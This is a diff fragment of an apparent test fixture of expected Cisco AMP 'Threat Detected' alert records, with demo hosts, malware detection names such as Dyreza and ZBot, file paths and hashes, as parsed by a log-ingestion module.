"cisco-amp", @@ -5404,7 +1814,7 @@ ] }, { - "@timestamp": "2021-01-15T10:10:53.000Z", + "@timestamp": "2021-01-15T10:19:59.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", @@ -5416,7 +1826,7 @@ ], "cisco.amp.connector_guid": "test_connector_guid", "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533667064295456780", + "cisco.amp.detection_id": "6533669409347600426", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ @@ -5425,14 +1835,14 @@ "cisco.amp.related.mac": [ "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 478000000, + "cisco.amp.timestamp_nanoseconds": 240000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6533667064295457000, + "event.id": 6533669409347600000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, @@ -5440,15 +1850,13 @@ "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", "file.name": "ekjrngjker.exe", - "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", "fileset.name": "amp", "host.hostname": "Demo_AMP_Threat_Audit", "host.name": "Demo_AMP_Threat_Audit", - "host.os.family": "windows", - "host.os.platform": "windows", "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 298855, + "log.offset": 47413, "related.hash": [ "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", "b99e0a8c56f963246b6464b9fffbf7a2", @@ -5471,60 +1879,64 @@ ] }, { - "@timestamp": "2021-01-15T10:10:52.000Z", + "@timestamp": "2021-01-15T10:19:58.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" + "mac": "63:5f:47:2b:89:91" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176257340669427770", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533669405052633129", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" + "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 988000000, + "cisco.amp.timestamp_nanoseconds": 847000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6176257340669428000, + "event.id": 6533669405052633000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 300181, + "log.offset": 48732, "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "related.hosts": [ - "Demo_Dyre" + "Demo_AMP_Threat_Audit" ], "related.ip": [ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -5532,7 +1944,7 @@ ] }, { - "@timestamp": "2021-01-15T10:10:51.000Z", + "@timestamp": "2021-01-15T10:18:58.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", @@ -5543,8 +1955,8 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.DFC.MalParent", - "cisco.amp.detection_id": "6533667055705522187", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533669147354595368", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ @@ -5553,14 +1965,14 @@ "cisco.amp.related.mac": [ "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 565000000, + "cisco.amp.timestamp_nanoseconds": 375000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6533667055705522000, + "event.id": 6533669147354595000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, @@ -5576,7 +1988,7 @@ "host.os.platform": "windows", "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 301500, + "log.offset": 50051, "related.hash": [ "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", "b99e0a8c56f963246b6464b9fffbf7a2", @@ -5599,64 +2011,56 @@ ] }, { - "@timestamp": "2021-01-15T10:10:11.000Z", + "@timestamp": "2021-01-15T10:18:58.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "b2:4b:d5:c2:a6:9f" + "mac": "63:5f:47:2b:89:91" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "ZBot:FakeAlert-tpd", - "cisco.amp.detection_id": "5832268410590855181", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533669147354595367", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", - "cisco.amp.file.parent.disposition": "Unknown", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "b2:4b:d5:c2:a6:9f" + "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 13000000, + "cisco.amp.timestamp_nanoseconds": 360000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 5832268414885822000, + "event.id": 6533669147354595000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "e74f1b3fffc4ae61e077bbdec3230e95", - "file.hash.sha1": "e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5", - "file.hash.sha256": "8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a", - "file.name": "2_3756858138.exe", - "file.path": "\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\2_3756858138.exe", + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", "fileset.name": "amp", - "host.hostname": "Demo_Zbot", - "host.name": "Demo_Zbot", - "host.os.family": "windows", - "host.os.platform": "windows", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 302825, - "process.hash.md5": "9a2e18cb348feb772d02fb8f8728ab82", - "process.hash.sha1": "5df10f3387f7ff512e420240f81bde68a2b4c7aa", - "process.hash.sha256": "0723932d68702a59c4c8bf6a670a098cd55c39f4a3037fa8c2e6d2641fbfe85f", - "process.name": "a.exe", - "process.pid": 3020, + "log.offset": 51377, "related.hash": [ - "8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a", - "e74f1b3fffc4ae61e077bbdec3230e95", - "e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5" + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "related.hosts": [ - "Demo_Zbot" + "Demo_AMP_Threat_Audit" ], "related.ip": [ "8.8.8.8", @@ -5672,64 +2076,56 @@ ] }, { - "@timestamp": "2021-01-15T10:10:10.000Z", + "@timestamp": "2021-01-15T10:18:57.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "b2:4b:d5:c2:a6:9f" + "mac": "63:5f:47:2b:89:91" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "ZBot:FakeAlert-tpd", - "cisco.amp.detection_id": "5832268410590855180", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533669143059628070", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", - "cisco.amp.file.parent.disposition": "Unknown", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "b2:4b:d5:c2:a6:9f" + "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 810000000, + "cisco.amp.timestamp_nanoseconds": 968000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 5832268410590855000, + "event.id": 6533669143059628000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "e74f1b3fffc4ae61e077bbdec3230e95", - "file.hash.sha1": "e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5", - "file.hash.sha256": "8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a", - "file.name": "2_3756858138.exe", - "file.path": "\\\\?\\C:\\Documents and Settings\\Administrator\\Local Settings\\Temp\\2_3756858138.exe", + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", "fileset.name": "amp", - "host.hostname": "Demo_Zbot", - "host.name": "Demo_Zbot", - "host.os.family": "windows", - "host.os.platform": "windows", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 304431, - "process.hash.md5": "9a2e18cb348feb772d02fb8f8728ab82", - "process.hash.sha1": "5df10f3387f7ff512e420240f81bde68a2b4c7aa", - "process.hash.sha256": "0723932d68702a59c4c8bf6a670a098cd55c39f4a3037fa8c2e6d2641fbfe85f", - "process.name": "a.exe", - "process.pid": 3020, + "log.offset": 52696, "related.hash": [ - "8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a", - "e74f1b3fffc4ae61e077bbdec3230e95", - "e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5" + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "related.hosts": [ - "Demo_Zbot" + "Demo_AMP_Threat_Audit" ], "related.ip": [ "8.8.8.8", @@ -5745,7 +2141,7 @@ ] }, { - "@timestamp": "2021-01-15T10:09:53.000Z", + "@timestamp": "2021-01-15T10:18:25.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", @@ -5757,7 +2153,7 @@ ], "cisco.amp.connector_guid": "test_connector_guid", "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176257087266357305", + "cisco.amp.detection_id": "6176259286289612895", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ @@ -5766,14 +2162,14 @@ "cisco.amp.related.mac": [ "23:d5:92:eb:f8:9b" ], - "cisco.amp.timestamp_nanoseconds": 942000000, + "cisco.amp.timestamp_nanoseconds": 669000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6176257087266357000, + "event.id": 6176259286289613000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, @@ -5786,7 +2182,7 @@ "host.hostname": "Demo_Dyre", "host.name": "Demo_Dyre", "input.type": "log", - "log.offset": 307596, + "log.offset": 54015, "related.hash": [ "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", "e9d8c15e7d18678dd41771f72ed6693c", @@ -5806,129 +2202,60 @@ ] }, { - "@timestamp": "2021-01-15T10:09:51.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.DFC.MalParent", - "cisco.amp.detection_id": "6533666798007484426", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 469000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533666798007484000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 308915, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:09:50.000Z", + "@timestamp": "2021-01-15T10:18:13.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" + "mac": "23:d5:92:eb:f8:9b" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.DFC.MalParent", - "cisco.amp.detection_id": "6533666793712517128", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176259234750005342", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" + "23:d5:92:eb:f8:9b" ], - "cisco.amp.timestamp_nanoseconds": 948000000, + "cisco.amp.timestamp_nanoseconds": 657000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6533666793712517000, + "event.id": 6176259234750005000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "C:\\ekjrngjker.exe", + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.user.name": "user@testdomain.com", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", "input.type": "log", - "log.offset": 311551, + "log.offset": 55334, "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" ], "related.hosts": [ - "Demo_AMP_Threat_Audit" + "Demo_Dyre" ], "related.ip": [ "8.8.8.8", "10.10.10.10" ], - "related.user": [ - "user@testdomain.com" - ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -5936,72 +2263,60 @@ ] }, { - "@timestamp": "2021-01-15T10:09:48.000Z", + "@timestamp": "2021-01-15T10:18:01.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" + "mac": "23:d5:92:eb:f8:9b" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.DFC.MalParent", - "cisco.amp.detection_id": "6533666785122582535", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176259183210397789", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", - "cisco.amp.file.parent.disposition": "Clean", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" + "23:d5:92:eb:f8:9b" ], - "cisco.amp.timestamp_nanoseconds": 372000000, + "cisco.amp.timestamp_nanoseconds": 645000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6533666785122583000, + "event.id": 6176259183210398000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.os.family": "windows", - "host.os.platform": "windows", - "host.user.name": "user@testdomain.com", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", "input.type": "log", - "log.offset": 312869, - "process.hash.md5": "51138beea3e2c21ec44d0932c71762a8", - "process.hash.sha1": "8939cf35447b22dd2c6e6f443446acc1bf986d58", - "process.hash.sha256": "5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124", - "process.name": "rundll32.exe", - "process.pid": 596, + "log.offset": 56653, "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" ], "related.hosts": [ - "Demo_AMP_Threat_Audit" + "Demo_Dyre" ], "related.ip": [ "8.8.8.8", "10.10.10.10" ], - "related.user": [ - "user@testdomain.com" - ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -6009,60 +2324,72 @@ ] }, { - "@timestamp": "2021-01-15T10:09:42.000Z", + "@timestamp": "2021-01-15T10:17:58.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" + "mac": "e1:e5:94:ea:a5:44" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176257040021717048", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6180335966167760897", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" + "e1:e5:94:ea:a5:44" ], - "cisco.amp.timestamp_nanoseconds": 304000000, + "cisco.amp.timestamp_nanoseconds": 875000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6176257040021717000, + "event.id": 6180335966167761000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "file.hash.md5": "b2e15a06b0cca8a926c94f8a8eae3d88", + "file.hash.sha1": "f9b02ad8d25157eebdb284631ff646316dc606d5", + "file.hash.sha256": "fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc", + "file.name": "Fax.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\Documents\\Fax\\Fax.exe", "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", + "host.hostname": "Demo_Upatre", + "host.name": "Demo_Upatre", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 314451, + "log.offset": 57972, + "process.hash.md5": "8b88ebbb05a0e56b7dcc708498c02b3e", + "process.hash.sha1": "cea0890d4b99bae3f635a16dae71f69d137027b9", + "process.hash.sha256": "9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad", + "process.name": "explorer.exe", + "process.pid": 3164, "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + "fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc", + "b2e15a06b0cca8a926c94f8a8eae3d88", + "f9b02ad8d25157eebdb284631ff646316dc606d5" ], "related.hosts": [ - "Demo_Dyre" + "Demo_Upatre" ], "related.ip": [ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -6070,60 +2397,66 @@ ] }, { - "@timestamp": "2021-01-15T10:09:30.000Z", + "@timestamp": "2021-01-15T10:17:57.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" + "mac": "63:5f:47:2b:89:91" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176256988482109495", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533668885361590309", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" + "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 292000000, + "cisco.amp.timestamp_nanoseconds": 672000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6176256988482109000, + "event.id": 6533668885361590000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 315770, + "log.offset": 59570, "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "related.hosts": [ - "Demo_Dyre" + "Demo_AMP_Threat_Audit" ], "related.ip": [ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -6131,7 +2464,7 @@ ] }, { - "@timestamp": "2021-01-15T10:09:29.000Z", + "@timestamp": "2021-01-15T10:17:57.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", @@ -6142,8 +2475,8 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.DFC.MalParent", - "cisco.amp.detection_id": "6533666703518203910", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533668885361590308", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ @@ -6152,14 +2485,14 @@ "cisco.amp.related.mac": [ "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 782000000, + "cisco.amp.timestamp_nanoseconds": 653000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6533666703518204000, + "event.id": 6533668885361590000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, @@ -6173,7 +2506,7 @@ "host.name": "Demo_AMP_Threat_Audit", "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 317089, + "log.offset": 60896, "related.hash": [ "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", "b99e0a8c56f963246b6464b9fffbf7a2", @@ -6196,7 +2529,7 @@ ] }, { - "@timestamp": "2021-01-15T10:09:27.000Z", + "@timestamp": "2021-01-15T10:17:57.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", @@ -6207,25 +2540,24 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.DFC.MalParent", - "cisco.amp.detection_id": "6533666694928269316", + 